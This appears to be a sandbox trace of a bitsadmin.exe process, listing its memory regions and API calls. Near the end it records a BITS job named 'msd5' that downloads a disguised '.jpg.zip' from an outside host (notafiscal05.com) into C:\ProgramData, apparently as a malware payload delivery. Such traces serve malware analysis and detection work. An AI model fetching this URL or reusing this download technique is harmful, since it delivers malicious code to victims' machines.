name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1431
start_va = 0x7ffd9000
end_va = 0x7ffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd9000"
filename = ""
Region:
id = 1432
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1433
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1434
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1435
start_va = 0x90000
end_va = 0xf6fff
entry_point = 0x90000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1436
start_va = 0x100000
end_va = 0x1c7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 1437
start_va = 0x1d0000
end_va = 0x2cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1438
start_va = 0x440000
end_va = 0x44ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000440000"
filename = ""
Region:
id = 1439
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1440
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1441
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1442
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1443
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1444
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1445
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1446
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1447
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1448
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1449
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1450
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1451
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1452
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1453
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 1454
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1455
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1456
start_va = 0x2d0000
end_va = 0x3d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002d0000"
filename = ""
Region:
id = 1457
start_va = 0x3e0000
end_va = 0x3e6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003e0000"
filename = ""
Region:
id = 1458
start_va = 0x3f0000
end_va = 0x3f1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003f0000"
filename = ""
Region:
id = 1459
start_va = 0x400000
end_va = 0x400fff
entry_point = 0x400000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 1460
start_va = 0x410000
end_va = 0x410fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 1461
start_va = 0x420000
end_va = 0x420fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000420000"
filename = ""
Region:
id = 1462
start_va = 0x830000
end_va = 0x142ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000830000"
filename = ""
Region:
id = 1463
start_va = 0x450000
end_va = 0x4abfff
entry_point = 0x450000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1464
start_va = 0x450000
end_va = 0x4abfff
entry_point = 0x450000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1465
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1466
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1467
start_va = 0x450000
end_va = 0x5cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000450000"
filename = ""
Region:
id = 1468
start_va = 0x450000
end_va = 0x52efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000450000"
filename = ""
Region:
id = 1469
start_va = 0x590000
end_va = 0x5cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 1470
start_va = 0x430000
end_va = 0x430fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000430000"
filename = ""
Region:
id = 1471
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1472
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1473
start_va = 0x530000
end_va = 0x530fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000530000"
filename = ""
Region:
id = 1474
start_va = 0x770000
end_va = 0x7affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000770000"
filename = ""
Region:
id = 1475
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 1476
start_va = 0x1480000
end_va = 0x14bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 1477
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1478
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 1479
start_va = 0x540000
end_va = 0x57bfff
entry_point = 0x540000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1480
start_va = 0x540000
end_va = 0x57bfff
entry_point = 0x540000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1481
start_va = 0x540000
end_va = 0x57bfff
entry_point = 0x540000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1482
start_va = 0x540000
end_va = 0x57bfff
entry_point = 0x540000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1483
start_va = 0x540000
end_va = 0x57bfff
entry_point = 0x540000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1484
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1485
start_va = 0x14c0000
end_va = 0x178efff
entry_point = 0x14c0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1486
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1487
start_va = 0x540000
end_va = 0x57ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 1488
start_va = 0x5d0000
end_va = 0x60ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 1489
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 1490
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 1491
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 141
os_tid = 0xc3c
[0068.699] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8fecc | out: lpSystemTimeAsFileTime=0x8fecc*(dwLowDateTime=0xd98f8910, dwHighDateTime=0x1d469c7))
[0068.699] GetCurrentProcessId () returned 0xc38
[0068.699] GetCurrentThreadId () returned 0xc3c
[0068.699] GetTickCount () returned 0x1f1cd
[0068.699] QueryPerformanceCounter (in: lpPerformanceCount=0x8fec4 | out: lpPerformanceCount=0x8fec4*=1814264500000) returned 1
[0068.700] GetModuleHandleA (lpModuleName=0x0) returned 0x7e0000
[0068.700] __set_app_type (_Type=0x1)
[0068.700] __p__fmode () returned 0x757a31f4
[0068.700] __p__commode () returned 0x757a31fc
[0068.700] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x807f33) returned 0x0
[0068.700] __wgetmainargs (in: _Argc=0x820824, _Argv=0x82082c, _Env=0x820828, _DoWildCard=0, _StartInfo=0x820838 | out: _Argc=0x820824, _Argv=0x82082c, _Env=0x820828) returned 0
[0068.701] _onexit (_Func=0x80925e) returned 0x80925e
[0068.701] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0068.701] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0068.701] AitLogFeatureUsageByApp () returned 0x0
[0068.702] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0068.702] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0068.702] VerifyVersionInfoW (in: lpVersionInformation=0x8fd40, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x8fd40) returned 1
[0068.702] SetLastError (dwErrCode=0x0)
[0068.702] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0068.702] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0068.702] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0068.702] GetCurrentProcess () returned 0xffffffff
[0068.702] GetCurrentThread () returned 0xfffffffe
[0068.702] GetCurrentProcess () returned 0xffffffff
[0068.702] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x80c3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x80c3b0*=0x80) returned 1
[0068.702] SetConsoleCtrlHandler (HandlerRoutine=0x7f74cb, Add=1) returned 1
[0068.702] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0068.702] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0068.702] SetThreadUILanguage (LangId=0x0) returned 0x409
[0068.703] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0068.703] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0068.703] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0068.704] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0068.704] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0068.704] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0068.704] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0068.704] swprintf_s (in: _Dst=0x8fe38, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0068.704] GetFileType (hFile=0x7) returned 0x2
[0068.705] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x8fdac | out: lpMode=0x8fdac) returned 1
[0068.705] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x8fddc, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8fddc*=0x2) returned 1
[0068.705] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x8fde8, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8fde8*=0x24) returned 1
[0068.705] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x8fdec, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8fdec*=0x1e) returned 1
[0068.705] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x8fdf0, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8fdf0*=0x29) returned 1
[0068.705] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x8fdf4, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8fdf4*=0x2) returned 1
[0068.706] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x8fdf8, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8fdf8*=0x5e) returned 1
[0068.706] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x8fdfc, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8fdfc*=0x58) returned 1
[0068.706] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x8fe00, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8fe00*=0x2) returned 1
[0068.706] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0068.718] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0068.718] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x8fe4c | out: lpNumberOfEvents=0x8fe4c) returned 1
[0068.719] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0068.719] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x80c3a8 | out: lpMode=0x80c3a8) returned 1
[0068.719] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x80c390 | out: lpConsoleScreenBufferInfo=0x80c390) returned 1
[0068.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x80c38c | out: lpMode=0x80c38c) returned 1
[0068.719] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0068.719] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0068.719] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0068.719] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0068.719] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0068.719] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0068.719] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0068.719] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0068.720] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0068.720] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0068.720] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0068.720] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0068.720] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0068.720] CoCreateInstance (in: rclsid=0x7f65d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0x7f65b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0x80c3b4 | out: ppv=0x80c3b4*=0x1ea53c) returned 0x0
[0068.765] IBackgroundCopyManager:CreateJob (in: This=0x1ea53c, DisplayName="msd5", Type=0x0, pJobId=0x8fe14, ppJob=0x8fe10 | out: pJobId=0x8fe14*(Data1=0x1a46c34d, Data2=0x3c85, Data3=0x4779, Data4=([0]=0xac, [1]=0x25, [2]=0x66, [3]=0xbd, [4]=0xbc, [5]=0xf9, [6]=0xa0, [7]=0xa8)), ppJob=0x8fe10*=0x1ea614) returned 0x0
[0068.773] CoTaskMemAlloc (cb=0x50) returned 0x200c88
[0068.773] IUnknown:AddRef (This=0x1ea614) returned 0x2
[0068.773] IUnknown:AddRef (This=0x1ea614) returned 0x3
[0068.773] PeekMessageW (in: lpMsg=0x8fd8c, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x8fd8c) returned 0
[0068.773] IUnknown:Release (This=0x1ea614) returned 0x2
[0068.773] IBackgroundCopyJob:SetPriority (This=0x1ea614, Val=0x0) returned 0x0
[0068.777] IBackgroundCopyJob:AddFile (This=0x1ea614, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhme.jpg.zip?231938807", LocalName="C:\\ProgramData\\tempa\\marxvxinhhme.jpg") returned 0x0
[0068.785] IBackgroundCopyJob:SetNotifyFlags (This=0x1ea614, Val=0xb) returned 0x0
[0068.917] IBackgroundCopyJob:SetNotifyInterface (This=0x1ea614, Val=0x200c88) returned 0x0
[0068.917] IUnknown:QueryInterface (in: This=0x200c88, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f890 | out: ppvObject=0x8f890*=0x0) returned 0x80004002
[0068.917] IUnknown:QueryInterface (in: This=0x200c88, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f850 | out: ppvObject=0x8f850*=0x0) returned 0x80004002
[0068.917] IUnknown:QueryInterface (in: This=0x200c88, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f838 | out: ppvObject=0x8f838*=0x0) returned 0x80004002
[0068.917] IUnknown:QueryInterface (in: This=0x200c88, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f7ec | out: ppvObject=0x8f7ec*=0x200c88) returned 0x0
[0068.917] IUnknown:AddRef (This=0x200c88) returned 0x3
[0068.918] IUnknown:QueryInterface (in: This=0x200c88, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f74c | out: ppvObject=0x8f74c*=0x0) returned 0x80004002
[0068.918] IUnknown:QueryInterface (in: This=0x200c88, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x200ed4 | out: ppvObject=0x200ed4*=0x0) returned 0x80004002
[0068.918] IUnknown:QueryInterface (in: This=0x200c88, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x8f754 | out: ppvObject=0x8f754*=0x0) returned 0x80004002
[0068.918] IUnknown:Release (This=0x200c88) returned 0x2
[0068.920] IUnknown:QueryInterface (in: This=0x200c88, riid=0x1f1950*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x8ec5c | out: ppvObject=0x8ec5c*=0x0) returned 0x80004002
[0068.920] IUnknown:QueryInterface (in: This=0x200c88, riid=0x1f1950*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x8ec5c | out: ppvObject=0x8ec5c*=0x200c88) returned 0x0
[0068.920] IUnknown:QueryInterface (in: This=0x200c88, riid=0x1f1950*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x1f82d8 | out: ppvObject=0x1f82d8*=0x200c88) returned 0x0
[0068.922] IBackgroundCopyJob:Resume (This=0x1ea614) returned 0x0
[0068.928] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0068.928] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0068.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x8fd70 | out: lpMode=0x8fd70) returned 1
[0068.928] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0068.928] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x8fdb0*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0068.929] PeekMessageW (in: lpMsg=0x8fd88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8fd88) returned 1
[0068.929] TranslateMessage (lpMsg=0x8fd88) returned 0
[0068.929] DispatchMessageW (lpMsg=0x8fd88) returned 0x1
[0068.929] IUnknown:QueryInterface (in: This=0x200c88, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x8f8e4 | out: ppvObject=0x8f8e4*=0x0) returned 0x80004002
[0068.929] IBackgroundCopyCallback:JobModification (This=0x200c88, pJob=0x1ea6a4, dwReserved=0x0) returned 0x0
[0068.929] IBackgroundCopyJob:GetState (in: This=0x1ea614, pVal=0x200c94 | out: pVal=0x200c94) returned 0x0
[0068.930] IBackgroundCopyCallback:JobModification (This=0x200c88, pJob=0x1ea6a4, dwReserved=0x0) returned 0x0
[0068.930] IBackgroundCopyJob:GetState (in: This=0x1ea614, pVal=0x200c94 | out: pVal=0x200c94) returned 0x0
[0068.959] IBackgroundCopyJob:GetType (in: This=0x1ea614, pVal=0x8e3b8 | out: pVal=0x8e3b8) returned 0x0
[0068.960] IBackgroundCopyJob:GetProgress (in: This=0x1ea614, pVal=0x200c98 | out: pVal=0x200c98) returned 0x0
[0068.960] IBackgroundCopyJob:GetPriority (in: This=0x1ea614, pVal=0x8e3b4 | out: pVal=0x8e3b4) returned 0x0
[0068.961] CoTaskMemFree (pv=0x0)
[0068.961] IBackgroundCopyJob:GetDisplayName (in: This=0x1ea614, pVal=0x8e3cc | out: pVal=0x8e3cc*="msd5") returned 0x0
[0068.962] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e374 | out: lpConsoleScreenBufferInfo=0x8e374) returned 1
[0068.962] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x8e38c | out: lpNumberOfCharsWritten=0x8e38c) returned 1
[0068.962] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x8e38c | out: lpNumberOfAttrsWritten=0x8e38c) returned 1
[0068.962] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0068.963] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.963] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e360 | out: lpConsoleScreenBufferInfo=0x8e360) returned 1
[0068.963] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8e378, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e378*=0xa) returned 1
[0068.963] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
